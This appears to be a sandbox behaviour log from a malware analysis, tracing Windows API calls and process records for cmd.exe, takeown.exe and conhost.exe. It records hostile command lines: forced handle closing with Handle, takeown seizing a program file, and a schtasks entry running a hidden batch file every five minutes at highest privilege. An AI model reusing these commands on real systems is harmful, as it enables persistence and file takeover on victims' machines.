0 [0192.556] ferror (_File=0x77032960) returned 0 [0192.556] GetProcessHeap () returned 0x490000 [0192.557] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x108) returned 0x4a62e0 [0192.557] fgets (in: _Buf=0x4a62e8, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0201.206] feof (_File=0x77032960) returned 0 [0201.206] ferror (_File=0x77032960) returned 0 [0201.206] GetProcessHeap () returned 0x490000 [0201.206] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a62e0, Size=0x208) returned 0x4a62e0 [0201.206] GetProcessHeap () returned 0x490000 [0201.206] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a62e0) returned 0x208 [0201.206] fgets (in: _Buf=0x4a632e, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0201.206] feof (_File=0x77032960) returned 0 [0201.206] ferror (_File=0x77032960) returned 0 [0201.206] GetProcessHeap () returned 0x490000 [0201.206] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a62e0, Size=0x308) returned 0x4a62e0 [0201.206] GetProcessHeap () returned 0x490000 [0201.206] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a62e0) returned 0x308 [0201.206] fgets (in: _Buf=0x4a6331, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0204.303] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0204.305] GetProcessHeap () returned 0x490000 [0204.305] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a62e0, Size=0x9e) returned 0x4a62e0 [0204.305] GetProcessHeap () returned 0x490000 [0204.305] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a62e0) returned 0x9e [0204.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a6331, cbMultiByte=73, lpWideCharStr=0x4a62e8, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0204.306] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37edb4 | out: _Buffer="\r\n") returned 2 [0204.306] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.306] GetFileType (hFile=0x7) returned 0x2 [0204.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.306] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37ed74 | out: lpMode=0x37ed74) returned 1 [0204.307] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.307] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eda0*=0x2) returned 1 [0204.309] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0204.309] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37edb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0204.309] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37edb0 | out: _Buffer=">") returned 1 [0204.309] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.309] GetFileType (hFile=0x7) returned 0x2 [0204.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.310] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37ed78 | out: lpMode=0x37ed78) returned 1 [0204.310] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.310] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eda4*=0x26) returned 1 [0204.310] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.310] GetFileType (hFile=0x7) returned 0x2 [0204.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37effc | out: lpMode=0x37effc) returned 1 [0204.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.311] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x37f028, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x37f028*=0x1) returned 1 [0204.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.312] GetFileType (hFile=0x7) returned 0x2 [0204.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.312] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37efe0 | out: lpMode=0x37efe0) returned 1 [0204.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.312] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4b4ab0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x37f00c, lpReserved=0x0 | out: lpBuffer=0x4b4ab0*, lpNumberOfCharsWritten=0x37f00c*=0xc) returned 1 [0204.313] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f018 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0204.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.313] GetFileType (hFile=0x7) returned 0x2 [0204.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37efd8 | out: lpMode=0x37efd8) returned 1 [0204.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x37f004, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f004*=0x2c) returned 1 [0204.315] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f034 | out: _Buffer=") ") returned 2 [0204.316] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.316] GetFileType (hFile=0x7) returned 0x2 [0204.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.316] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eff4 | out: lpMode=0x37eff4) returned 1 [0204.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.317] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f020*=0x2) returned 1 [0204.317] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f054 | out: _Buffer="\r\n") returned 2 [0204.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.317] GetFileType (hFile=0x7) returned 0x2 [0204.317] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0204.318] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f014 | out: lpMode=0x37f014) returned 1 [0204.318] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.318] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f040*=0x2) returned 1 [0204.319] GetConsoleTitleW (in: lpConsoleTitle=0x37eb64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.321] GetConsoleTitleW (in: lpConsoleTitle=0x37e8f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.321] InitializeProcThreadAttributeList (in: lpAttributeList=0x37e780, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37e848 | out: lpAttributeList=0x37e780, lpSize=0x37e848) returned 1 [0204.321] UpdateProcThreadAttribute (in: lpAttributeList=0x37e780, dwFlags=0x0, Attribute=0x60001, lpValue=0x37e840, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37e780, lpPreviousValue=0x0) returned 1 [0204.321] GetStartupInfoW (in: lpStartupInfo=0x37e73c | out: lpStartupInfo=0x37e73c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0204.337] CloseHandle (hObject=0x84) returned 1 [0204.337] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.337] GetProcessHeap () returned 0x490000 [0204.337] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a7f30 | out: hHeap=0x490000) returned 1 [0204.337] GetEnvironmentStringsW () returned 0x4a6b80* [0204.338] GetProcessHeap () returned 0x490000 [0204.338] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb7a) returned 0x4a7f30 [0204.338] FreeEnvironmentStringsW (penv=0x4a6b80) returned 1 [0204.338] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0214.701] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x37e71c | out: lpExitCode=0x37e71c*=0x1) returned 1 [0214.701] CloseHandle (hObject=0x74) returned 1 [0214.702] _vsnwprintf (in: _Buffer=0x37e864, _BufferCount=0x13, _Format="%08X", _ArgList=0x37e728 | out: _Buffer="00000001") returned 8 [0214.702] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0214.702] GetProcessHeap () returned 0x490000 [0214.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a7f30 | out: hHeap=0x490000) returned 1 [0214.702] GetEnvironmentStringsW () returned 0x4a6b80* [0214.702] GetProcessHeap () returned 0x490000 [0214.703] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb7a) returned 0x4a7f30 [0214.703] FreeEnvironmentStringsW (penv=0x4a6b80) returned 1 [0214.703] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.703] GetProcessHeap () returned 0x490000 [0214.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a7f30 | out: hHeap=0x490000) returned 1 [0214.703] GetEnvironmentStringsW () returned 0x4a6b80* [0214.703] GetProcessHeap () returned 0x490000 [0214.703] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb7a) returned 0x4a7f30 [0214.703] FreeEnvironmentStringsW (penv=0x4a6b80) returned 1 [0214.703] GetProcessHeap () returned 0x490000 [0214.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d50 | out: hHeap=0x490000) returned 1 [0214.703] DeleteProcThreadAttributeList (in: lpAttributeList=0x37e780 | out: lpAttributeList=0x37e780) [0214.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.704] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.705] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.705] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0214.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.706] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0214.706] SetConsoleInputExeNameW () returned 0x1 [0214.706] GetConsoleOutputCP () returned 0x1b5 [0214.706] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0214.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0214.708] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0214.708] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.708] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0214.708] GetProcessHeap () returned 0x490000 [0214.708] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a68f8 | out: hHeap=0x490000) returned 1 [0214.708] GetProcessHeap () returned 0x490000 [0214.708] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a67c8 | out: hHeap=0x490000) returned 1 [0214.708] GetProcessHeap () returned 0x490000 [0214.708] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a66a0 | out: hHeap=0x490000) returned 1 [0214.708] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6628 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a65a0 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6388 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4af0 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d68 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a62c0 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d80 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.709] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6288 | out: hHeap=0x490000) returned 1 [0214.709] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6228 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491248 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a61c8 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6168 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a60f0 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911f0 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4912a0 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911a0 | out: hHeap=0x490000) returned 1 [0214.710] GetProcessHeap () returned 0x490000 [0214.710] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491140 | out: hHeap=0x490000) returned 1 [0214.711] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.711] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0214.711] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0x0, lpOverlapped=0x0) returned 1 [0214.711] GetLastError () returned 0x0 [0214.711] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.711] GetFileType (hFile=0x74) returned 0x1 [0214.711] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.711] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0214.711] GetProcessHeap () returned 0x490000 [0214.711] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0214.711] GetProcessHeap () returned 0x490000 [0214.711] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0214.712] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.712] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0214.712] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f114, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f114*=0x0, lpOverlapped=0x0) returned 1 [0214.712] GetLastError () returned 0x0 [0214.712] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.712] GetFileType (hFile=0x74) returned 0x1 [0214.712] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.712] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0214.712] GetProcessHeap () returned 0x490000 [0214.712] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0214.712] GetProcessHeap () returned 0x490000 [0214.712] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0214.713] longjmp () [0214.713] _tell (_FileHandle=3) returned 226 [0214.713] _close (_FileHandle=3) returned 0 [0214.713] CmdBatNotification () returned 0x1 [0214.713] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.713] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.713] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.713] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0214.714] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.714] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0214.714] SetConsoleInputExeNameW () returned 0x1 [0214.714] GetConsoleOutputCP () returned 0x1b5 [0214.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0214.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.714] exit (_Code=1) Process: id = "151" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x358a2000" os_pid = "0x5cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0xb10" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 656 os_tid = 0xb2c Thread: id = 662 os_tid = 0x6c8 Process: id = "152" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x332ec000" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 657 os_tid = 0xab0 Thread: id = 664 os_tid = 0xaf0 Thread: id = 668 os_tid = 0x690 Process: id = "153" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x338f5000" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x92c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 658 os_tid = 0xab8 [0167.459] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efdac | out: lpSystemTimeAsFileTime=0x1efdac*(dwLowDateTime=0x1dc9f960, dwHighDateTime=0x1d68287)) [0167.459] GetCurrentProcessId () returned 0x6dc [0167.459] GetCurrentThreadId () returned 0xab8 [0167.460] GetTickCount () returned 0x1156d06 [0167.460] QueryPerformanceCounter (in: lpPerformanceCount=0x1efda4 | out: lpPerformanceCount=0x1efda4*=28779855765) returned 1 [0167.462] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0167.462] __set_app_type (_Type=0x1) [0167.462] __p__fmode () returned 0x770331f4 [0167.462] __p__commode () returned 0x770331fc [0167.462] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0167.463] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0167.463] GetCurrentThreadId () returned 0xab8 [0167.463] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab8) returned 0x60 [0167.463] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.463] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0167.464] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.464] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0167.464] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efd3c | out: phkResult=0x1efd3c*=0x0) returned 0x2 [0167.465] VirtualQuery (in: lpAddress=0x1efd73, lpBuffer=0x1efd0c, dwLength=0x1c | out: lpBuffer=0x1efd0c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.465] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efd0c, dwLength=0x1c | out: lpBuffer=0x1efd0c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0167.465] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efd0c, dwLength=0x1c | out: lpBuffer=0x1efd0c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0167.465] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efd0c, dwLength=0x1c | out: lpBuffer=0x1efd0c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.465] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efd0c, dwLength=0x1c | out: lpBuffer=0x1efd0c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0167.465] GetConsoleOutputCP () returned 0x1b5 [0167.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0167.466] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0167.466] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.466] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0167.466] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.466] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0167.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0167.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0167.467] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.467] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0167.468] _get_osfhandle (_FileHandle=0) returned 0x3 [0167.468] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0167.468] GetEnvironmentStringsW () returned 0x622230* [0167.468] GetProcessHeap () returned 0x610000 [0167.468] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x622d70 [0167.469] FreeEnvironmentStringsW (penv=0x622230) returned 1 [0167.469] GetProcessHeap () returned 0x610000 [0167.469] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x61ec30 [0167.469] GetEnvironmentStringsW () returned 0x622230* [0167.469] GetProcessHeap () returned 0x610000 [0167.469] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x6238b0 [0167.470] FreeEnvironmentStringsW (penv=0x622230) returned 1 [0167.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eecac | out: phkResult=0x1eecac*=0x68) returned 0x0 [0167.470] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eecb4, lpData=0x1eecb8, lpcbData=0x1eecb0*=0x1000 | out: lpType=0x1eecb4*=0x0, lpData=0x1eecb8*=0x0, lpcbData=0x1eecb0*=0x1000) returned 0x2 [0167.470] RegQueryValueExW (in: hKey=0x68, 